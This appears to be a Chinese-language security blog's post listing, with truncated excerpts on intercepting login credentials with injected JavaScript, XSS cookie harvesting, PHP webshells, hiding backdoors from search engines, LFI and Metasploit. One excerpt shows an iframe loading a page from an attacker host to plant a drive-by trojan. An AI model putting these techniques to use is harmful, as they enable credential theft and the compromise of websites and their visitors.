原创 Javascript-截獲登錄表單的用戶名和密碼-v1.5
version 1.0 需要代碼添加到登陸表單的後面,纔可以正常使用。 經完善後(這裏有兩種方法),可以添加在任何位置,比如<head> 標籤裏,而不必添加在登錄表單的後面。 sniffer.js 方法一 /* author: eT4
2020-07-06 23:53:19
2
原创 MS14-065 漏洞播報
當用戶使用 Internet Explorer 查看經特殊設計的網頁時允許遠程執行代碼。 成功利用這些漏洞的攻擊者可以獲得與當前用戶相同的用戶權限。 Windows 7(32 位/64位)Service Pack 1 上的 IE8、IE
2020-07-06 23:53:19
1
原创 通過“Robots tag”防止搜索引擎收錄網頁後門
這是我這b374k.php上看到的。 我們通過“Robots <META> tag”來告訴搜索引擎spider不要索引頁面的內容以及不掃描頁面中的鏈接。這樣他人就不能通過搜索關鍵字的方式找到我們的網頁後門了。 <META NAME="RO
2020-07-06 23:53:19
原创 PHP小馬
http://xiaojianke.blog.163.com是我原來的博客,工作後換成了C博客,這裏吐槽一下網易博客太差了。 看到網上那麼多PHP小馬,我也來自己寫一個,練習PHP編程。 <?php error_reporting(E_
2020-07-06 23:53:19
原创 Reading files in MySQL with file_priv = no
好吧,我是在法客上看到園長髮的這篇文章,然後追到烏雲,然後追到源頭,覺得很是實用,所以就貼出來了。 All we know for reading files in MySQL we need file_priv permission.
2020-07-06 23:53:19
原创 通過UA判斷客戶端的操作系統類型
我們可以通過一個javascript腳本獲取客戶端返回的User-Agent,然後根據其中的信息判斷客戶端使用什麼操作系統。 Windows系列 Windows NT 俗稱 NT 5.0 Windows 2000 NT 5.1 Win
2020-07-06 23:53:19
2
原创 初學網頁掛馬
我覺得網頁掛馬要考慮兩個因素:隱蔽性、成功率。 我們只需保證瀏覽器加載並執行我們構造的特殊網頁即可,這樣的方法有許多。 方法一,我們可以在首頁加入以下這行代碼。 <iframe src="http://www.hacker.com/h
2020-02-20 19:02:47
原创 Metasploit-MSSQL滲透-實戰篇
Kali Linux是基於Debian的Linux發行版, 設計用於數字取證和滲透測試。而Metasploit是Kali Linux中的一款開源安全漏洞檢測工具。 打開metasploit的控制檯終端: 先使用NMAP對目標進
2020-02-20 19:02:47
原创 Kali-linux安裝之後的簡單設置
完整版請參考原文:http://xiao106347.blog.163.com/blog/static/215992078201342410347137/ 1.更新軟件源: 修改sources.list文件:leafpad /etc/a
2020-02-20 19:02:47
原创 php LFI讀php文件源碼以及直接webshell
小菜無意中看到大牛的一篇文章,看後覺得很受益,所以就轉載過來了。 之前只知道“include”語句是包含並運行指定文件,遇到的話也只是找上傳點然後getshell。 看來這篇文章後,才知道還可以讀取php文件的源代碼,這樣的話,就可以讀取
2020-02-20 19:02:47
1
原创 Fix metasploit " postgresql selected, no connection"
新手遇到的問題就是多,不要緊有google在。 原文地址:https://forums.kali.org/showthread.php?22485-No-connection-to-Database-for-metasploit-afte
2020-02-20 19:02:47
10
原创 XSS信息刺探腳本
重複造輪子,是的,我在學習編程。 該 javascript 腳本主要收集客戶端用戶的 User_Agent、Cookie、Domain、Flash_Version。 接收信息的文件由PHP編寫,同時增加客戶端的IP和訪問時間。 xss_
2020-02-20 19:02:47
原创 Javascript-截獲登錄表單的用戶名和密碼-v1.0
一段截獲登錄表單的用戶名和密碼的Javascript腳本。 拿下了網站的數據庫卻破不了MD5的情況下,可以嘗試利用這段腳本截獲登錄表單的用戶名和密碼。 這段腳本需要調用到DOM,所以應把這段代碼插在登錄表單之後。 sniffer.js
2020-02-20 19:02:47
原创 kali-linux 安裝Flash
在虛擬機安裝好kali 後就想找部電影看的,可以提示“由於您未安裝flash播放器視頻無法播放,點擊這裏安裝”。 好吧,點進去(跳轉到Flash官網http://get.adobe.com/flashplayer/),選擇.tar.gz
2020-02-20 19:02:47
原创 Fix metasploit “Database not connected or cache not built”
剛開始玩kali-linux的時候也碰到過這個問題,然後google找到了解決的方案,轉載回來。 原文地址:http://www.dailysecurity.net/2013/05/11/fix-metasploit-database-n
2020-02-20 19:02:47